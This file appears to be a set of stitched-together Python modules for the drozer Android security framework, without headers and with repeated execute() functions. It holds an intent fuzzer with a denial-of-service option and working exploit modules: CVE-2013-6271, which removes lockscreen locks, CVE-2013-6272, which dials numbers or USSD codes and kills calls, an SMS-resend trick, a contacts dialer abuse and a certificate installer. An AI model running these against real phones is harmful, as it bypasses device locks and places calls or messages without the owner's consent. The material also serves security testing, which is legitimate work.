def run_seed_file(self, file_name, device):
'''
Fuction for runing all intents from a seed file
'''
with open(file_name, 'r') as f:
lines = f.readlines()
if lines is not None:
intents = len(lines)
print("Number of intents:" + str(intents) + "\n")
for line in lines:
parse_intent = line.split(" ")
intent_type = parse_intent[2]
package_name = parse_intent[4]
component = parse_intent[6]
if intent_type == 'fuzzing':
uri = parse_intent[8]
cat = parse_intent[10]
ac = parse_intent[12]
fl = parse_intent[14]
extra_type = parse_intent[16]
key = parse_intent[18]
extra_value = parse_intent[20]
msg = intent_type + " " + package_name + " " + \
component + " " + uri + " " + cat + " " + \
ac + " " + fl + " " + extra_type + " " + \
key + " " + extra_value
print msg
log_in_logcat(str(msg), device)
try:
intent = android.Intent(component=(package_name,
str(component)),
flags=[fl],
data_uri=uri,
category=cat,
action=ac,
extras=[(str(extra_type),
str(key),
str(extra_value))
])
intent.flags.append("ACTIVITY_NEW_TASK")
self.getContext().startActivity(
intent.buildIn(self))
except:
e = sys.exc_info()[0]
elif intent_type == 'broadcast':
intent = android.Intent(component=(package_name,
str(component)))
msg = intent_type + " " + package_name + " " + component
print msg
log_in_logcat(str(msg), device)
try:
self.getContext().sendBroadcast(
intent.buildIn(self))
except:
pass
return intents
def run_intent(self, package_name, component, uri, ac, cat, fl,
extra_type, key, extra_value, device):
'''
Function for running fuzzy intent with parameters
'''
flag = []
msg = "fuzzing_intent " + "type: fuzzing" + " package: " + \
str(package_name) + " component: " + str(component) + \
" data_uri: " + str(uri) + " category: " + str(cat) + \
" action: " + str(ac) + " flag: " + str(fl) + \
" extra_type: " + str(extra_type) + " extra_key: " + \
str(key) + " extra_value: " + str(extra_value)
print msg
log_in_logcat(str(msg), device)
try:
intent = android.Intent(component=(package_name, str(component)),
flags=[fl], data_uri=uri, category=cat,
action=ac, extras=[(str(extra_type),
str(key),
str(extra_value))])
#you can't open an activity from another app
#without "ACTIVITY_NEW_TASK" flag
intent.flags.append("ACTIVITY_NEW_TASK")
self.getContext().startActivity(intent.buildIn(self))
except:
e = sys.exc_info()[0]
#print e
save_logcat("fuzzing", str(package_name), str(component), device,
self.current_dir)
def execute(self, arguments):
if arguments.message == None or arguments.telephone == None:
self.stderr.write("Must specify a message with \"-m\" and a recipient with \"-t\"\n")
return
if (len(arguments.component) != 2):
self.stderr.write("[-] Invalid package and component: %s %s%(arguments.component[0],arguments.component[1]\n")
return
self.stdout.write("[+] Drafting SMS message to send.\n")
#sleep(2)
self.draftsms(arguments)
self.stdout.write("[+] Calling app to send message to drafts.\n")
#sleep(2)
intent = android.Intent(component=(arguments.component[0], arguments.component[1]), flags=['ACTIVITY_NEW_TASK'])
if intent.isValid():
self.getContext().startActivity(intent.buildIn(self))
else:
self.stderr.write("[-] Invalid App Activity Intent!\n")
sleep(2)
self.stdout.write("[+] Sending draft messages.\n")
self.smsordered(arguments, self.RESULT_ERROR_RADIO_OFF)
self.stdout.write("[+] Message sent.\n")
def execute(self, arguments):
# Initiate the phone call
intent = android.Intent(action="android.intent.action.CALL",
data_uri="tel:" + arguments.number,
flags=["ACTIVITY_NEW_TASK"])
self.getContext().startActivity(intent.buildIn(self))
self.stdout.write("[*] Sent intent to call %s\n" % arguments.number)
def draftsms(self, arguments):
act = "android.intent.action.SENDTO"
cat = None
comp = None
data = "smsto:" + arguments.telephone
extr = [['string', 'sms_body', arguments.message]]
flgs = ['ACTIVITY_NEW_TASK']
#build the intent
intent = android.Intent(action=act, category=cat, data_uri=data, component=comp, extras=extr, flags=flgs)
if intent.isValid():
self.getContext().startActivity(intent.buildIn(self))
else:
self.stderr.write("[-] Invalid!\n")
def smsordered(self, arguments, initialcode):
# This is the vulnerability - setting RESULT_ERROR_RADIO_OFF causes message to be requeued
act = "com.android.mms.transaction.MESSAGE_SENT"
cat = None
comp = ("com.android.mms", "com.android.mms.transaction.SmsReceiver")
data = "content://sms"
extr = None
flgs = None
#build the intent
intent = android.Intent(action=act, category=cat, data_uri=data, component=comp, extras=extr, flags=flgs)
if intent.isValid():
self.getContext().sendOrderedBroadcast(intent.buildIn(self), None, None, None, initialcode, None, None)
else:
self.stderr.write("[-] Invalid Intent!\n")
def execute(self, arguments):
if arguments.code != None and arguments.telephone != None:
self.stderr.write("Please specify only -t or -c\n")
return
if arguments.code == None and arguments.telephone == None:
self.stderr.write("Please specify -t or -c\n")
return
self.stdout.write("[+] Exploiting CVE-2014-N/A\n")
if arguments.telephone != None:
#set action as CALL
act = "android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED"
#add the prefix
data = "tel:%s" % arguments.telephone
self.stdout.write("[+] Dialing: %s\n" % arguments.telephone)
elif arguments.code != None:
#set action as CALL
act = "android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED"
#add the prefix
data = "tel:%s" % arguments.code
self.stdout.write("[+] Sending code: %s\n" % arguments.code)
else:
self.stdout.write("[-] Something went wrong.\n")
return
#build the intent
intent = android.Intent(action=act,
data_uri=data,
component=[
'com.android.contacts',
'com.android.contacts.ContactsListActivity'
],
flags=['ACTIVITY_NEW_TASK'])
if intent.isValid():
self.getContext().startActivity(intent.buildIn(self))
else:
self.stderr.write("[-] Invalid!\n")
def execute(self, arguments):
if arguments.code != None and arguments.telephone != None and arguments.kill!= None:
self.stderr.write("Please specify only -t, -c or -k not all\n")
arguments.print_help()
return
if arguments.code == None and arguments.telephone == None and arguments.kill == None:
self.stderr.write("Please specify -t, -c or -k\n")
return
self.stdout.write("[+] Exploiting CVE-2013-6272\n")
if arguments.telephone != None:
#set action as CALL
act = "com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION"
#add the prefix
data = "tel:%s" % arguments.telephone
self.stdout.write("[+] Dialing: %s\n" % arguments.telephone)
elif arguments.code != None:
#set action as CALL
act = "com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION"
#add the prefix
data = "tel:%s" % arguments.code
self.stdout.write("[+] Sending code: %s\n" % arguments.code)
elif arguments.kill == True:
act = "com.android.phone.ACTION_HANG_UP_ONGOING_CALL"
data = None
self.stdout.write("[+] Killing ongoing call\n")
else:
self.stdout.write("[-] Something went wrong.\n")
return
#build the intent
intent = android.Intent(action=act, data_uri=data, component=['com.android.phone','com.android.phone.PhoneGlobals$NotificationBroadcastReceiver'])
if intent.isValid():
self.getContext().sendBroadcast(intent.buildIn(self))
else:
self.stderr.write("[-] Invalid!\n")
def execute(self, arguments):
self.stdout.write("[+] Exploiting CVE-2013-6271 - Removing all set locks!\n")
#well we do not need to define the None's, but for the fun of it lets do it :)
act = None
cat = None
comp = ['com.android.settings','com.android.settings.ChooseLockGeneric']
data = None
extr = [['boolean', 'confirm_credentials', 'false'], ['integer','lockscreen.password_type', '0']]
flgs = ['ACTIVITY_NEW_TASK']
#build the intent
intent = android.Intent(action=act, category=cat, data_uri=data, component=comp, extras=extr, flags=flgs)
if intent.isValid():
self.getContext().startActivity(intent.buildIn(self))
else:
self.stderr.write("[-] Invalid!\n")
def execute(self, arguments):
try:
print "Uploading"
myfile = open(arguments.source, 'rb')
with myfile:
cert = myfile.read()
intent = android.Intent(action="android.credentials.INSTALL",
extras=[],
flags=[])
name = arguments.name
if arguments.name == None:
name = os.path.basename(arguments.source).split('.')[0]
intent.extras.append(("string", "name", name))
intent.extras.append(("bytearray", "CERT", cert))
intent.flags.append(("ACTIVITY_NEW_TASK"))
self.getContext().startActivity(intent.buildIn(self))
print "Done"
except Exception as error:
print error
def execute(self, arguments):
package_name = ""
fuzz_parameters = []
fuzz_number = 7
device = ""
intents = 1
if arguments.device:
device = arguments.device
test_all = 0
params = ""
#set results folder (~/fuzzinozer_results is implicit value);
#if you want to change it go to "~/.bashrc file"
self.current_dir = ""
pm = self.packageManager()
env = os.environ.get("FUZZ_RES")
if env is None:
os.environ["FUZZ_RES"] = os.path.expanduser("~") + \
"/fuzzinozer_results"
env = os.environ.get("FUZZ_RES")
self.current_dir = str(env)
if not os.path.isdir(env):
getoutput("mkdir " + env)
found = 0
if arguments.select_fuzz_parameters:
params = arguments.select_fuzz_parameters
if arguments.template_fuzz_parameters_number:
fuzz_number = int(arguments.template_fuzz_parameters_number)
fuzz_parameters = self.generate_templates(fuzz_number)
intents = len(fuzz_parameters)
if arguments.dos_attack:
found = 1
nr = int(arguments.dos_attack)
self.dos(nr)
total_intents = nr
if arguments.complete_test:
intents = len(actions)*len(flags)*len(extra_keys) * \
len(extra_types)*len(categories)
total_intents = 0
if arguments.test_all:
test_all = 1
for package in self.packageManager().getPackages():
packageNameString = package.applicationInfo.packageName
activities = []
if arguments.fuzzing_intent:
activities = FuzzinozerPackageManager(self). \
getActivities(str(packageNameString))
elif arguments.broadcast_intent:
activities = FuzzinozerPackageManager(self). \
getReceivers(str(packageNameString))
if (activities is not None):
total_intents = total_intents + intents*len(activities)
if arguments.package_name:
activities = []
package_name = arguments.package_name
if arguments.broadcast_intent:
activities = FuzzinozerPackageManager(self). \
getReceivers(package_name)
else:
activities = FuzzinozerPackageManager(self). \
getActivities(package_name)
if (activities is not None):
total_intents = total_intents + intents*len(activities)
print("Number of intents:" + str(total_intents) + "\n")
seed_file = ""
if arguments.run_seed:
found = 1
seed_file = arguments.run_seed
if seed_file is not "":
print "RUN INTENTS FROM " + seed_file
total_intents = self.run_seed_file(seed_file, device)
if arguments.package_name or arguments.test_all:
if os.path.isfile(str(str(self.current_dir) +"/all_intents.txt")):
os.remove(str(str(self.current_dir) +"/all_intents.txt"))
if arguments.broadcast_intent:
for package in self.packageManager().getPackages():
packageNameString = str(package.applicationInfo.packageName)
if (packageNameString == package_name or test_all == 1):
found = 1
pm = self.packageManager()
receivers = []
receivers = FuzzinozerPackageManager(self). \
getReceivers(packageNameString)
if (receivers is not None):
for val in receivers:
msg = "broadcast_intent " + \
"type: broadcast" + \
" package: " + packageNameString + \
" component: " + str(val) + " "
print msg
log_in_logcat(str(msg), device)
intent = android.Intent(component=(packageNameString,
str(val)))
try:
self.getContext().sendBroadcast(intent.buildIn(self))
except:
pass
save_logcat("broadcast", packageNameString,
val, device, self.current_dir)
result_folder = str(self.current_dir) + "/Results_" + \
str('broadcast') + "_" + \
str(packageNameString)
if os.path.isdir(result_folder):
if os.listdir(result_folder) == []:
shutil.rmtree(result_folder)
elif arguments.fuzzing_intent:
for package in self.packageManager().getPackages():
packageNameString = str(package.applicationInfo.packageName)
if (packageNameString == package_name or test_all == 1):
found = 1
pm = self.packageManager()
activities = []
activities = FuzzinozerPackageManager(self).getActivities(packageNameString)
if (activities is not None):
for val in activities:
#if template_fuzz_parameters_number run all the generated templates
if (fuzz_number < 7):
for temp in fuzz_parameters:
print ("TEMPLATE:" + temp)
extra_type = str(random.choice(extra_types))
if temp[0] == "0":
ac = random.choice(actions)
else:
ac = string_generator(random.randint(10, 100))
if temp[1] == "0":
cat = random.choice(categories)
else:
cat = string_generator(random.randint(10, 100))
if temp[2] == "0":
uri = string_generator(random.randint(10, 100))
else:
uri = string_generator(random.randint(10, 100))
if temp[3] == "0":
key = random.choice(extra_keys)
else:
key = string_generator(random.randint(10, 100))
if temp[4] == "0":
extra_value = str(random_value(extra_type))
else:
extra_value = string_generator(random.randint(10, 100))
if temp[5] == "0":
fl = random.choice(flags)
else:
fl = string_generator(random.randint(10, 100))
self.run_intent(packageNameString,
val, uri, ac, cat,
fl, extra_type, key,
extra_value, device)
else:
uri = generate_random_uri()
if "category" in params:
cat = string_generator(random.randint(10, 100))
else:
cat = random.choice(categories)
if "action" in params:
ac = string_generator(random.randint(10, 100))
else:
ac = random.choice(actions)
if "flag" in params:
fl = string_generator(random.randint(10, 100))
else:
fl = random.choice(flags)
if "extra_key" in params:
key = string_generator(random.randint(10, 100))
else:
key = random.choice(extra_keys)
extra_type = str(random.choice(extra_types))
extra_value = str(random_value(extra_type))
self.run_intent(packageNameString, val,
uri, ac, cat, fl,
extra_type, key,
extra_value, device)
elif arguments.complete_test:
for package in self.packageManager().getPackages():
packageNameString = package.applicationInfo.packageName
if (packageNameString == package_name or arguments.test_all):
found = 1
save_state = False
reload_option = False
aux_num = " "
if arguments.save_state:
save_state = True
if arguments.reload:
reload_option = True
aux_num = arguments.reload
self.test_all_possible(packageNameString, device,
self.current_dir, save_state,
reload_option, aux_num)
print("Total number of intents:" + str(total_intents) + "\n")
else:
print "Wrong parameters!! Run help to see the parameters"
print("Total number of intents:" + str(total_intents) + "\n")
if (found == 0):
print ("Package not installed")
